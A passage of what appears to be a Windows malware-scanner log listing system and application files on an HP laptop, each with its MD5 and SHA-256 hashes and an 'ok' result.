12:17:20.0613 0x1aa8 [ 506708142BC63DABA64F2D3AD1DCD5BF, 9C36A08D9E7932FF4DA7B5F24E6B42C92F28685B8ABE964C870E8D7670FD531A ] C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
12:17:20.0613 0x1aa8 C:\Program Files (x86)\Google\Update\GoogleUpdate.exe - ok
12:17:20.0616 0x1aa8 [ 8DFB5752FCE145A6B295093C0A8BE131, F38029C8B36EFD46B1F6CCA0089FF4EFB0AB246497E38EDFF6A67FAC804D4A97 ] C:\Windows\System32\dxgi.dll
12:17:20.0616 0x1aa8 C:\Windows\System32\dxgi.dll - ok
12:17:20.0620 0x1aa8 [ 4C92EB7535CAA1681A77D928FBF9771F, 7D02B2357CA02393CA711C3C499AAD86B792EEFFDC67F2CE52F7F7BB8A28DE79 ] C:\Windows\System32\d3d11.dll
12:17:20.0620 0x1aa8 C:\Windows\System32\d3d11.dll - ok
12:17:20.0623 0x1aa8 [ DA24EDFC1D6C1B67C010D34652B7052F, 0499E99F7B794C1FE8E8C03658F0DCDFC3B0FF5315A1871FCB0C33D612A15BD1 ] C:\Program Files (x86)\Google\Update\1.3.24.7\goopdate.dll
12:17:20.0623 0x1aa8 C:\Program Files (x86)\Google\Update\1.3.24.7\goopdate.dll - ok
12:17:20.0626 0x1aa8 [ 332FEAB1435662FC6C672E25BEB37BE3, 6BED1A3A956A859EF4420FEB2466C040800EAF01EF53214EF9DAB53AEFF1CFF0 ] C:\Windows\explorer.exe
12:17:20.0626 0x1aa8 C:\Windows\explorer.exe - ok
12:17:20.0631 0x1aa8 [ 18AB2E5A40064ED5F7791AC5946A90F3, B7536CE56702C23B1CEC3E1B6C78866E0A76808B85A92AF3733D9ED9429E004C ] C:\Windows\SysWOW64\msimg32.dll
12:17:20.0631 0x1aa8 C:\Windows\SysWOW64\msimg32.dll - ok
12:17:20.0635 0x1aa8 [ 43964FA89CCF97BA6BE34D69455AC65F, 10E3B89A5470E1BB6F73382135DD2352F5073C1EE8485D7476CFB5122D4AAA2F ] C:\Windows\SysWOW64\uxtheme.dll
12:17:20.0635 0x1aa8 C:\Windows\SysWOW64\uxtheme.dll - ok
12:17:20.0639 0x1aa8 [ AE1A8F59397193DD7FC8A8DBD3866A89, DC56359413BC3A5BA46311D6326FA4EAF42C5F2D150AB49CCCB10D0444A775B7 ] C:\Windows\System32\igd10umd64.dll
12:17:20.0639 0x1aa8 C:\Windows\System32\igd10umd64.dll - ok
12:17:20.0644 0x1aa8 [ 60D6DBDD8813452EE89B58BD22612DD7, 303AD2603E7A1F3D42711A0026D40B50748D4A31324261EFFD54A026DB6AF86C ] C:\Program Files (x86)\Norton Management\Engine\3.2.2.12\matray.dll
12:17:20.0644 0x1aa8 C:\Program Files (x86)\Norton Management\Engine\3.2.2.12\matray.dll - ok
12:17:20.0648 0x1aa8 [ 465BEA35F7ED4A4A57686DEA7EA10F47, 7F1B3CA09AB045F805DA5765BE7DD270F5DDACE3073017F7386FF1E2FA82D6FB ] C:\Windows\SysWOW64\cscapi.dll
12:17:20.0648 0x1aa8 C:\Windows\SysWOW64\cscapi.dll - ok
12:17:20.0654 0x1aa8 [ D5A444B63637EC0932172C6719A10252, 5B2F51B102EB3FE551A5D727D5280BA9417C3AC62E224997A3549F19677EAEE0 ] C:\Program Files (x86)\Google\Update\1.3.24.7\GoogleCrashHandler.exe
12:17:20.0654 0x1aa8 C:\Program Files (x86)\Google\Update\1.3.24.7\GoogleCrashHandler.exe - ok
12:17:20.0661 0x1aa8 [ 102008784225A3DEB2709626B82D43B6, 77D6137513A1B661F5471CEFBF1B5D3DE96367D9F94427042FD0F3B21DC6E2D6 ] C:\Program Files (x86)\Norton Management\Engine\3.2.2.12\symhtml.dll
12:17:20.0661 0x1aa8 C:\Program Files (x86)\Norton Management\Engine\3.2.2.12\symhtml.dll - ok
12:17:20.0667 0x1aa8 [ EED05D42D91835064703E2318552ED25, E9EE1E2253445B207B76F5D3073C612ED979A982522C1515E0FE8FA9641AE568 ] C:\Windows\System32\ExplorerFrame.dll
12:17:20.0667 0x1aa8 C:\Windows\System32\ExplorerFrame.dll - ok
12:17:20.0673 0x1aa8 [ EE6269B47E49DAA450B11A12C9A25FD5, 5369555292A4AB3452C6D04BC2CB15C08556D4B6BDC22700B94D441BC8CA4C8A ] C:\Program Files (x86)\HP SimplePass 2012\TouchControl.exe
12:17:20.0673 0x1aa8 C:\Program Files (x86)\HP SimplePass 2012\TouchControl.exe - ok
12:17:20.0679 0x1aa8 [ D1DE1EAFDE97BE41CF6585027FF3E732, 76F17D4DF440D6734DC8157092D94EB18C2A73A0A49BEEA289E7B3EDE30E86A2 ] C:\Windows\SysWOW64\comdlg32.dll
12:17:20.0679 0x1aa8 C:\Windows\SysWOW64\comdlg32.dll - ok
12:17:20.0685 0x1aa8 [ D5AEFAD57C08349A4393D987DF7C715D, C36A45BC2448DF30CD17BD2F8A17FC196FAFB685612CACCEB22DC7B58515C201 ] C:\Windows\SysWOW64\winmm.dll
12:17:20.0685 0x1aa8 C:\Windows\SysWOW64\winmm.dll - ok
12:17:20.0689 0x1aa8 [ 69754747274B76E7FAF287239333D7E6, A0BAEC1E56E4B1A17C0D41B317526AF5BB11E7E488C7016067A6229346A23B16 ] C:\Windows\System32\msiltcfg.dll
12:17:20.0689 0x1aa8 C:\Windows\System32\msiltcfg.dll - ok
12:17:20.0693 0x1aa8 [ 936F728E04ACCF3F38801CFFCF1E3F40, 59CA86096F4B928E364B6A3C0408615F068BB8BC02DCFC5EAF4873EC6D6E0797 ] C:\Windows\SysWOW64\oledlg.dll
12:17:20.0693 0x1aa8 C:\Windows\SysWOW64\oledlg.dll - ok
12:17:20.0699 0x1aa8 [ 377DCECB137F43E29505A8A259ABBEC3, E2C739D67751D3A71105F7D93A471D8B409236E1CBDC3EFA1374D63387961761 ] C:\Program Files (x86)\HP SimplePass 2012\BioLayer.dll
12:17:20.0699 0x1aa8 C:\Program Files (x86)\HP SimplePass 2012\BioLayer.dll - ok
12:17:20.0704 0x1aa8 [ 3C63D52B521553E8CE9E67474FB1F528, 790AEA0606E1CF44BD621B65F7E8E0DB9048E30ECB867A784030FA4CB0BEF78D ] C:\Program Files (x86)\HP SimplePass 2012\TokenMachine.dll
12:17:20.0704 0x1aa8 C:\Program Files (x86)\HP SimplePass 2012\TokenMachine.dll - ok
12:17:20.0709 0x1aa8 [ 3FAD263CE1E2A6FFF40D00043B2275E3, 0063D7DAD57CA78C3DCE6A2E7D4FF7A47DBBBBAA33F92AEF747D8102E055D1AA ] C:\Windows\SysWOW64\winbio.dll
12:17:20.0709 0x1aa8 C:\Windows\SysWOW64\winbio.dll - ok
12:17:20.0715 0x1aa8 [ A0C8FD908EAEA5D1F83D9C50DCBBF6E8, 75474362DE5ACE922B43B616A382F026110316D05FDD57FAF9F5F4DCE9C075FA ] C:\Program Files (x86)\HP SimplePass 2012\TrueSuite.AutoSoftwareUpdate.dll
12:17:20.0715 0x1aa8 C:\Program Files (x86)\HP SimplePass 2012\TrueSuite.AutoSoftwareUpdate.dll - ok
12:17:20.0719 0x1aa8 [ D7F999823B787CF7AF086859741105FB, 09F9CC4D2D86C4344CE677D81C45B798FDE60196DBF70B0543A8FB7BE872AFDC ] C:\Program Files (x86)\Norton Management\Engine\3.2.2.12\cltaldis.dll
12:17:20.0719 0x1aa8 C:\Program Files (x86)\Norton Management\Engine\3.2.2.12\cltaldis.dll - ok
12:17:20.0725 0x1aa8 [ 720546B84ED5229E1584C8F3533A2F12, AB3C09C7F4B34D82786484439BCF78E7D7D202D1A75120ECFD140A74B8D36E86 ] C:\Program Files (x86)\Google\Update\1.3.24.7\GoogleCrashHandler64.exe
12:17:20.0725 0x1aa8 C:\Program Files (x86)\Google\Update\1.3.24.7\GoogleCrashHandler64.exe - ok
12:17:20.0732 0x1aa8 [ 4DD0E131B84623C0955925C9B798FFA8, 7C6AFA4B2F3103F53973DCC0CC00381E12776CEF8F5FF52B659C293981DB386E ] C:\Program Files (x86)\HP SimplePass 2012\BioMonitor.exe
12:17:20.0732 0x1aa8 C:\Program Files (x86)\HP SimplePass 2012\BioMonitor.exe - ok
12:17:20.0738 0x1aa8 [ 56DB22091119A04EFE3231D051057E6F, 03EE93EC53D7417B491F2701DF81592995E1A838483FD7F382A810EAC04D8467 ] C:\Program Files\Hightail Desktop App\YSINSE64.dll
12:17:20.0738 0x1aa8 C:\Program Files\Hightail Desktop App\YSINSE64.dll - ok
12:17:20.0743 0x1aa8 [ C5A99A4C0DC9F0F5A95BA0C83D30A549, F99CCCE303F0FC07D82D3BBA223E8CCE41FB7FA8FB5C2A9214C161826537C7C9 ] C:\Windows\SysWOW64\mstask.dll
12:17:20.0743 0x1aa8 C:\Windows\SysWOW64\mstask.dll - ok
12:17:20.0746 0x1aa8 [ 56B326CB5DC082E0204F4DB9E5416AFF, E392EC2DA0F3FCBA9C2245F5C180B65307957E8BFF6B60AAC4A2CFA32D4834E0 ] C:\Program Files (x86)\Norton Management\Engine\3.2.2.12\cltpe.dll
12:17:20.0747 0x1aa8 C:\Program Files (x86)\Norton Management\Engine\3.2.2.12\cltpe.dll - ok
12:17:20.0751 0x1aa8 [ 919001D2BB17DF06CA3F8AC16AD039F6, 5169ACFBE9E9D4C4012773ECDD28231C952675EF0C272A40F226E7B5D671B18B ] C:\Windows\SysWOW64\sxs.dll
12:17:20.0751 0x1aa8 C:\Windows\SysWOW64\sxs.dll - ok
12:17:20.0754 0x1aa8 [ FEE8B315148155CEF188010C7EF25D6E, D729FF6D370456E7B62BA29329095FA4894D8FA339577C1E9B2680FE2B698CE8 ] C:\Program Files (x86)\HP SimplePass 2012\DataManager.dll
12:17:20.0754 0x1aa8 C:\Program Files (x86)\HP SimplePass 2012\DataManager.dll - ok
12:17:20.0758 0x1aa8 [ 6F8EB694504B5A797317BDAB5DBA6B45, 4D0ADFBA37BC1FB1AAD0D47B809A8AA06D8FD758E228228110AA323A67F36098 ] C:\Users\Hewlett Packard\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll
12:17:20.0758 0x1aa8 C:\Users\Hewlett Packard\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll - ok
12:17:20.0762 0x1aa8 [ A7A8CA53D9C9FD90C07AB0EB38E5316B, B98722E76601A98F038F40703C4B8BD21B5EC3B65DC1B07B7C367C06448F8A0E ] C:\Windows\System32\dbghelp.dll
12:17:20.0762 0x1aa8 C:\Windows\System32\dbghelp.dll - ok
12:17:20.0766 0x1aa8 [ AB886378EEB55C6C75B4F2D14B6C869F, D6C4602EB8F291DADEDF3CD211013D4AC752DDE7E799C2D8D74AA4F5477CAED6 ] C:\Windows\System32\drivers\WUDFPf.sys
12:17:20.0766 0x1aa8 C:\Windows\System32\drivers\WUDFPf.sys - ok
12:17:20.0770 0x1aa8 [ B20F051B03A966392364C83F009F7D17, 88ECEB55AE91F58F592B96EBC10B572747D5A2F9B7629E8F371761E4F7408A65 ] C:\Windows\System32\WUDFSvc.dll
12:17:20.0770 0x1aa8 C:\Windows\System32\WUDFSvc.dll - ok
12:17:20.0773 0x1aa8 [ B1DF2D87DC8BF6072699AC8301B37796, D5A6FD1EDB627324DFA1A0555F1777A3313EF29DDE29982C3CE59DAF1ED0D105 ] C:\Windows\System32\WUDFPlatform.dll
12:17:20.0774 0x1aa8 C:\Windows\System32\WUDFPlatform.dll - ok
12:17:20.0777 0x1aa8 [ 567BC1309E05FCFA680ADB6E02260736, 50F57C5D0B9C8096F615C2335F2F252A074014CBBDC7FFF56C0501A8CFB3FB81 ] C:\Windows\System32\vaultsvc.dll
12:17:20.0777 0x1aa8 C:\Windows\System32\vaultsvc.dll - ok
12:17:20.0781 0x1aa8 [ 024352FEEC9042260BB4CFB4D79A206B, 60CB39086E10C5B66EBC15E4DF219620B344B4358D2918AB6BB3448A0AC8BE36 ] C:\Windows\System32\EhStorShell.dll
12:17:20.0781 0x1aa8 C:\Windows\System32\EhStorShell.dll - ok
12:17:20.0785 0x1aa8 [ 037A719DAD50603202C978CD802623E4, BD4C222913D32D7CF5FE0201FEBE7BD67FC39DF47A7A672C2D6C228A6E13B5DE ] C:\Windows\System32\ntshrui.dll
12:17:20.0785 0x1aa8 C:\Windows\System32\ntshrui.dll - ok
12:17:20.0788 0x1aa8 [ 1D63F4366288B8A7595397E27010FD44, 99EA4DDD88D9C4A4CC9B238F533CB4D2C062D46239173997E8594D8A75811A01 ] C:\Windows\System32\IconCodecService.dll
12:17:20.0789 0x1aa8 C:\Windows\System32\IconCodecService.dll - ok
12:17:20.0792 0x1aa8 [ 862586AD4B1355F7DCDE111EE0AAF350, 48AF3A1834640969660A37899A4CB17677FD499C26185AC940D284A0B4212FB3 ] C:\Windows\System32\d3dx10_40.dll
12:17:20.0792 0x1aa8 C:\Windows\System32\d3dx10_40.dll - ok
12:17:20.0796 0x1aa8 [ D21BACC00F62923CB14B4AA4BDBE1A07, B04FFA48D105093B401AA7711A0EE7412A749C51226CDEBAA5675F4842F8CE78 ] C:\Program Files (x86)\Norton Management\Engine\3.2.2.12\uialert.dll
12:17:20.0796 0x1aa8 C:\Program Files (x86)\Norton Management\Engine\3.2.2.12\uialert.dll - ok
12:17:20.0800 0x1aa8 [ 840601AACA3659120F196FCE88491848, 122360BFD820C5BBB21C9115FB0E88B9453C71362034ED98CA4919A59ED3AA9F ] C:\Program Files (x86)\Norton Management\Engine\3.2.2.12\userctxt.dll
12:17:20.0800 0x1aa8 C:\Program Files (x86)\Norton Management\Engine\3.2.2.12\userctxt.dll - ok
12:17:20.0804 0x1aa8 [ 9D2A2369AB4B08A4905FE72DB104498F, D6FA1705018BABABFA2362E05691A0D6408D14DE7B76129B16D0A1DAD6378E58 ] C:\Windows\System32\appinfo.dll
12:17:20.0804 0x1aa8 C:\Windows\System32\appinfo.dll - ok
12:17:20.0807 0x1aa8 [ 3AA101E8EDAB2DB4131333F4325C76A3, 4F7BD3DA5E58B18BFF106CFF7B45E75FD13EE556D433C695BA23EC80827E49DE ] C:\Windows\System32\wbiosrvc.dll
12:17:20.0807 0x1aa8 C:\Windows\System32\wbiosrvc.dll - ok
12:17:20.0811 0x1aa8 [ 0779A28E3470004026358D37C6EE120E, A9C7B0CBD6435BABF03B34DD5F13F2C3A292F29ED0CC59479D6BD9B450E34E68 ] C:\Program Files (x86)\Common Files\AuthenTec\TrueAPI.dll
12:17:20.0811 0x1aa8 C:\Program Files (x86)\Common Files\AuthenTec\TrueAPI.dll - ok
12:17:20.0815 0x1aa8 [ 025E7DBDB98866ED3CB2D4DDA70B364D, 78962F23F066E362AF1A4B98FA7D5E30AF30C561307438503031D30C944B6A6E ] C:\Windows\System32\runonce.exe
12:17:20.0815 0x1aa8 C:\Windows\System32\runonce.exe - ok
12:17:20.0819 0x1aa8 [ DD79A6B15C2F28DE98DF4852AAF6B13B, 0F7E9023E0BA4B40E2DE9A9FA34E85FEAF72B93049AAB3E1D73AD046BB113E05 ] C:\Program Files (x86)\Hewlett-Packard\HP Health Check\ActiveCheck\product_line\NCPluginUpdater.exe
12:17:20.0819 0x1aa8 C:\Program Files (x86)\Hewlett-Packard\HP Health Check\ActiveCheck\product_line\NCPluginUpdater.exe - ok
12:17:20.0822 0x1aa8 [ A08C010D859F8EB42BDD7E1D55B8CA27, F86EAFBF7AA41D8425156C07398EDC3BD42F1690BD3E15D27AEF2EDA86549F15 ] C:\Windows\System32\mscoree.dll
12:17:20.0823 0x1aa8 C:\Windows\System32\mscoree.dll - ok
12:17:20.0826 0x1aa8 [ 2AFBB91BBD2378933B26E6D68C140D1B, 1A4BD3BA6FDBECD4C686C84919698B48B2597F48B794248F3DC03A81D5ED9374 ] C:\Windows\SysWOW64\ieframe.dll
12:17:20.0826 0x1aa8 C:\Windows\SysWOW64\ieframe.dll - ok
12:17:20.0830 0x1aa8 [ D44067027714CC58B8AB0AC38FDA1A0B, 56E96A58B5A53A68485F8D2F7BA286F2B174AB910BD45145258D48251F489F02 ] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll
12:17:20.0830 0x1aa8 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll - ok
12:17:20.0834 0x1aa8 [ B24232BCA42AA784A5C951B74B7789D3, CE9706D8E92DAB71D3AC6177DF13C300B680A003418B56EF1C1052C3E9B6C0D0 ] C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorwks.dll
12:17:20.0834 0x1aa8 C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorwks.dll - ok
12:17:20.0838 0x1aa8 [ AB44EE3B916F1626B9C4222F2B6F2DE4, 9203116FF307FA6B37D0FCC7460BBF441CEBAE510C78967359EDB43A9FE2448E ] C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\bb750d3baf928f94ea3977e96af9769f\mscorlib.ni.dll
12:17:20.0838 0x1aa8 C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\bb750d3baf928f94ea3977e96af9769f\mscorlib.ni.dll - ok
12:17:20.0842 0x1aa8 [ 60F4AEFA103D421EA4A40E31409B4756, 037A8605CA504A4FF43E9D4DE9017CEA1E26D3556C975872C747E24D8B0835EF ] C:\Windows\SysWOW64\api-ms-win-downlevel-shell32-l1-1-0.dll
12:17:20.0842 0x1aa8 C:\Windows\SysWOW64\api-ms-win-downlevel-shell32-l1-1-0.dll - ok
12:17:20.0846 0x1aa8 [ 07AD88DF9EF73215458867EFC1BFFE9E, 8C659B6F31111C09448B68889623886658C96467E7E5C95C1714E18AD3924463 ] C:\Windows\System32\wbem\wmiprov.dll
12:17:20.0846 0x1aa8 C:\Windows\System32\wbem\wmiprov.dll - ok
12:17:20.0849 0x1aa8 [ 521202AA6F2B74FCCC6BC7E162109D71, 3B2F41EFDA68C82D9D50AF329AC9B403C806CBE74F87917CDB350E542ADDA017 ] C:\Windows\System32\wbem\unsecapp.exe
12:17:20.0849 0x1aa8 C:\Windows\System32\wbem\unsecapp.exe - ok
12:17:20.0853 0x1aa8 [ 220159496484D34009DE71CA1A68E0D4, 94BD3DEB4E84F95D80BE5775E5A612EFF181ECB212FB668674C67AD19194DE69 ] C:\Windows\System32\wbem\NCProv.dll
12:17:20.0853 0x1aa8 C:\Windows\System32\wbem\NCProv.dll - ok
12:17:20.0857 0x1aa8 [ 0A94DE4AA9864D312E60D747FD249ABE, C3A7D31624240142F745C2D5A86D383386ECDA875B8ACA0C3081F995CE1EF900 ] C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsec.dll
12:17:20.0857 0x1aa8 C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsec.dll - ok
12:17:20.0861 0x1aa8 [ 850BD2D2D9CB5894935C3B6333CAD6FD, AB1EE5FD5E2F1CC927C3EA92E71C91ACA566E69622D47AE780DA391B7C30DDD6 ] C:\Windows\System32\riched20.dll
12:17:20.0861 0x1aa8 C:\Windows\System32\riched20.dll - ok
12:17:20.0864 0x1aa8 [ 1B1431D9520C7578AD5633ED2A70625F, 6852FAC1355CA69226B727A1355D6DA8C0865F5EEDA45D7690701CFED7C542A1 ] C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorjit.dll
12:17:20.0864 0x1aa8 C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorjit.dll - ok
12:17:20.0869 0x1aa8 [ DE9EC2C90DA5A74ACA19AF8CF564748E, B640D88884262526842779A3A891F225BA52F34E18E27B25152DB018C00F598E ] C:\Windows\assembly\NativeImages_v2.0.50727_64\System\350ed175b92e48f5249a1bab538872e5\System.ni.dll
12:17:20.0869 0x1aa8 C:\Windows\assembly\NativeImages_v2.0.50727_64\System\350ed175b92e48f5249a1bab538872e5\System.ni.dll - ok
12:17:20.0872 0x1aa8 [ F0E839CDE31A9FF7F2D77A901099D334, B4FA1F7D4616FD90AB12963729C11BED0989D862871C8A115F3E97464A510BCE ] C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Drawing\981815c04012453ded108530fbdc4646\System.Drawing.ni.dll
12:17:20.0873 0x1aa8 C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Drawing\981815c04012453ded108530fbdc4646\System.Drawing.ni.dll - ok
12:17:20.0876 0x1aa8 [ F057F73C56937749F0652F8E9326BE1C, 585AE0FB5B9A76C739CEEEE3BA198A872D0D9BB60EAC9D88B0036D4B620A043C ] C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Windows.Forms\c97010ae0b7cd474407b3824041fbb40\System.Windows.Forms.ni.dll
12:17:20.0876 0x1aa8 C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Windows.Forms\c97010ae0b7cd474407b3824041fbb40\System.Windows.Forms.ni.dll - ok
12:17:20.0879 0x1aa8 [ D44741F65A1D71F65814A12CF6E2400A, C6721F830675ADC7E7FDE2B5E822E56F6A063146F5066F1E25EBFE86F0A87136 ] C:\Windows\SysWOW64\runonce.exe
12:17:20.0879 0x1aa8 C:\Windows\SysWOW64\runonce.exe - ok
12:17:20.0882 0x1aa8 [ 12C45E3CB6D65F73209549E2D02ECA7A, 9DFD9C58B90257C34D52B7156C1D2566BE32EE7BD4699DDE164A5F190EC4D44A ] C:\Windows\SysWOW64\propsys.dll
12:17:20.0882 0x1aa8 C:\Windows\SysWOW64\propsys.dll - ok
12:17:20.0886 0x1aa8 [ AD7B9C14083B52BC532FBA5948342B98, 17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE ] C:\Windows\SysWOW64\cmd.exe
12:17:20.0887 0x1aa8 C:\Windows\SysWOW64\cmd.exe - ok
12:17:20.0891 0x1aa8 [ 326C7F76A29897A892AA7726E91C1C67, 64305346B06EC14976130B0B80F14B4D5AB63E5B2A6A7B872EC9CE2BF8FADCD2 ] C:\Windows\SysWOW64\winbrand.dll
12:17:20.0891 0x1aa8 C:\Windows\SysWOW64\winbrand.dll - ok
12:17:20.0894 0x1aa8 [ 2C4A87CA8C00E98EFDCFA2E8EC9A3503, DA59CE662E98E56D89E2894D2AC8B9F324C16DA23C860640EDC2C82E0AD06097 ] C:\Windows\SysWOW64\shdocvw.dll
12:17:20.0894 0x1aa8 C:\Windows\SysWOW64\shdocvw.dll - ok
12:17:20.0898 0x1aa8 [ A85AB106C480911A54E9F0FD527A134A, F66F997C2BCB4A117DF1B93708E1FC4A43099895C7000CD8034CAD03ED76C0BE ] C:\Users\Hewlett Packard\AppData\Local\Temp\{2C7E5FEA-06B3-48D4-A7D7-9EB40D3CB649}.exe
12:17:20.0898 0x1aa8 C:\Users\Hewlett Packard\AppData\Local\Temp\{2C7E5FEA-06B3-48D4-A7D7-9EB40D3CB649}.exe - ok
12:17:20.0901 0x1aa8 [ 49ACA548B2423F1C67898E6AC719A9A6, 23D84137EAB9AFDD31CBB6776B6B25AD135A120AF7F7885EB5BBF9E0A2CCC4C1 ] C:\Windows\SysWOW64\api-ms-win-downlevel-advapi32-l2-1-0.dll
12:17:20.0902 0x1aa8 C:\Windows\SysWOW64\api-ms-win-downlevel-advapi32-l2-1-0.dll - ok
12:17:20.0906 0x1aa8 [ 9A85ABCE0FDD1AF8E79E731EB0B679F3, 2A610BEB16610FE2F2E9A50477A62A05481E8A5843A814955A0EDFF45D0304B3 ] C:\Windows\SysWOW64\dhcpcsvc.dll
12:17:20.0906 0x1aa8 C:\Windows\SysWOW64\dhcpcsvc.dll - ok
12:17:20.0909 0x1aa8 [ 81F6C1AE23B1C493D9E996C3103915D7, E22408B4D2EDE2F89E686A4FDCD4057BE27B86D050E9CB489F0FFB39C72AEC1D ] C:\Windows\SysWOW64\dhcpcsvc6.dll
12:17:20.0909 0x1aa8 C:\Windows\SysWOW64\dhcpcsvc6.dll - ok
12:17:20.0913 0x1aa8 [ F0D0E883EBBDC7615DC9EDEA0FFB2817, 58F1395445018CB16ED4D3710443FB5B0E087043F6A69F7B10D72D0455958954 ] C:\Windows\SysWOW64\FWPUCLNT.DLL
12:17:20.0913 0x1aa8 C:\Windows\SysWOW64\FWPUCLNT.DLL - ok
12:17:20.0916 0x1aa8 [ A054EA8FBE16D4D34F06D81A4F0088E2, 1CD4EECFDA374C8A7B8AD4E664DC057B9C75813AF776A616DC6D845905567CBD ] C:\Windows\SysWOW64\WindowsCodecs.dll
12:17:20.0916 0x1aa8 C:\Windows\SysWOW64\WindowsCodecs.dll - ok
12:17:20.0920 0x1aa8 [ F1278B3514EA6FA9BC39B20D26139AAC, 7FA1B8CCBB4771F3105EEACE2C13F949FA65C7F53817C783BDF9770F94FF12B5 ] C:\Windows\SysWOW64\msiltcfg.dll
12:17:20.0920 0x1aa8 C:\Windows\SysWOW64\msiltcfg.dll - ok
12:17:20.0924 0x1aa8 [ BE993B2D1745BCDDB51C39137CCB0927, C3AE83163B6382F2CE5B53A05E18F1CC2CBE60D09F87AAAD4493446E6DFD32AD ] C:\Program Files (x86)\Hightail Desktop App\YSINSE.dll
12:17:20.0924 0x1aa8 C:\Program Files (x86)\Hightail Desktop App\YSINSE.dll - ok
12:17:20.0927 0x1aa8 [ 40CAEEE0EAF1B8569F7C8DF6420F2CB9, E18D66455D00A6D2A2D7CC0833C233FE8A6DD910B59D6B5B5F82EF91450858DF ] C:\Windows\SysWOW64\sfc.dll
12:17:20.0927 0x1aa8 C:\Windows\SysWOW64\sfc.dll - ok
12:17:20.0930 0x1aa8 [ 84799328D87B3091A3BDD251E1AD31F9, F85521215924388830DBB13580688DB70B46AF4C7D82D549D09086438F8D237B ] C:\Windows\SysWOW64\sfc_os.dll
12:17:20.0931 0x1aa8 C:\Windows\SysWOW64\sfc_os.dll - ok
12:17:20.0934 0x1aa8 [ 846D0E4DB261CFAF363902E41498E961, D7E5591B7604FD583AF7FDA19E30928B24A6145318A3944E7D207F0CCEEB30D0 ] C:\Windows\SysWOW64\EhStorShell.dll
12:17:20.0934 0x1aa8 C:\Windows\SysWOW64\EhStorShell.dll - ok
12:17:20.0938 0x1aa8  [ 03F3B770DFBED6131653CEDA8CA780F0, 77373919DCA647F09851E7E460AE78FBD89F21516B961F84AC4446304E51E09C ] C:\Windows\SysWOW64\ntshrui.dll
12:17:20.0938 0x1aa8 C:\Windows\SysWOW64\ntshrui.dll - ok
12:17:20.0941 0x1aa8 [ 8B74CEC6980D4816B0037AE9A27E538F, 8721EDB4C51BF6020002FA5DDB1987C68590F9F433A2F18D9756B2DAC7542CB6 ] C:\Windows\SysWOW64\slc.dll
12:17:20.0941 0x1aa8 C:\Windows\SysWOW64\slc.dll - ok
12:17:20.0944 0x1aa8 [ 827CB0D6C3F8057EA037FF271F8E9795, 82760DBDDD38D2A31CAAF51D065DF4E7E1D0F0C22733A0AF653776EBF7B79470 ] C:\Windows\SysWOW64\imageres.dll
12:17:20.0945 0x1aa8 C:\Windows\SysWOW64\imageres.dll - ok
12:17:20.0948 0x1aa8 [ 4B78B431F225FD8624C5655CB1DE7B61, 198A5AF2125C7C41F531A652D200C083A55A97DC541E3C0B5B253C7329949156 ] C:\Windows\System32\aelupsvc.dll
12:17:20.0948 0x1aa8 C:\Windows\System32\aelupsvc.dll - ok
12:17:20.0951 0x1aa8 [ 51BF14039E8DB90B15B1CF86B4F9BEE6, 98314DF0FB6C086A179391DFC0824D5A7B1022D5C5297B9360A3A1C8F4615CED ] C:\Program Files (x86)\Common Files\AuthenTec\TrueOTPIntel.dll
12:17:20.0952 0x1aa8 C:\Program Files (x86)\Common Files\AuthenTec\TrueOTPIntel.dll - ok
12:17:20.0956 0x1aa8 [ 7CBA1071583158941786B14860B15E46, EC8BFF2B381E8C7B2EB242B05891CFA146C5EB06FC694005E75071555D75BAA5 ] C:\Program Files\Symantec\VIP Access SDK\VIPOTPProv.dll
12:17:20.0956 0x1aa8 C:\Program Files\Symantec\VIP Access SDK\VIPOTPProv.dll - ok
12:17:20.0959 0x1aa8 [ 53331389D5473B793607C2ABE62FB010, 24FD010D396DE2D1A0D38B87F25E6303E935AC7635FACFD49501BAFF8B4E817E ] C:\Program Files (x86)\Intel\Services\IPT\otpIha.dll
12:17:20.0960 0x1aa8 C:\Program Files (x86)\Intel\Services\IPT\otpIha.dll - ok
12:17:20.0963 0x1aa8 [ D5E459BED3DB9CF7FC6CC1455F177D2D, FCAB2130FAB57B6728C50D5B9E9924F001C43538DE4F675DE03537FF0D9B84BD ] C:\Windows\winsxs\x86_microsoft.vc80.atl_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d1cb102c435421de\ATL80.dll
12:17:20.0963 0x1aa8 C:\Windows\winsxs\x86_microsoft.vc80.atl_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d1cb102c435421de\ATL80.dll - ok
12:17:20.0967 0x1aa8 [ C9564CF4976E7E96B4052737AA2492B4, C3AC989C8489A23BB96400B1856F5325FFC67E844F04651EA5D61BC20A991C6D ] C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\msvcr80.dll
12:17:20.0968 0x1aa8 C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\msvcr80.dll - ok
12:17:20.0972 0x1aa8 [ B7F55E2AE978D3D34F7876EE5D689AAE, 2A950042529DC2C6495E691557043B5B15E483079F4135675E495C121F7C0ED0 ] C:\Program Files (x86)\CyberLink\YouCam\YCMMirage.exe
12:17:20.0972 0x1aa8 C:\Program Files (x86)\CyberLink\YouCam\YCMMirage.exe - ok
12:17:20.0976 0x1aa8 [ 5BB8C06EB5EA4BA22EE8A678F2D79B25, 019E9274DE2F5BAB16B4632B8A2E93DFC8DF0C08EC4EEA947B337FD29EB2E0CC ] C:\Windows\SysWOW64\devenum.dll
